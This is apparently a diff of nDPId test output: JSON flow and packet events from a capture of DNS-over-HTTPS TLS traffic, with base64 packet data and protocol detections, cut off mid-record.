{"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} -01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbV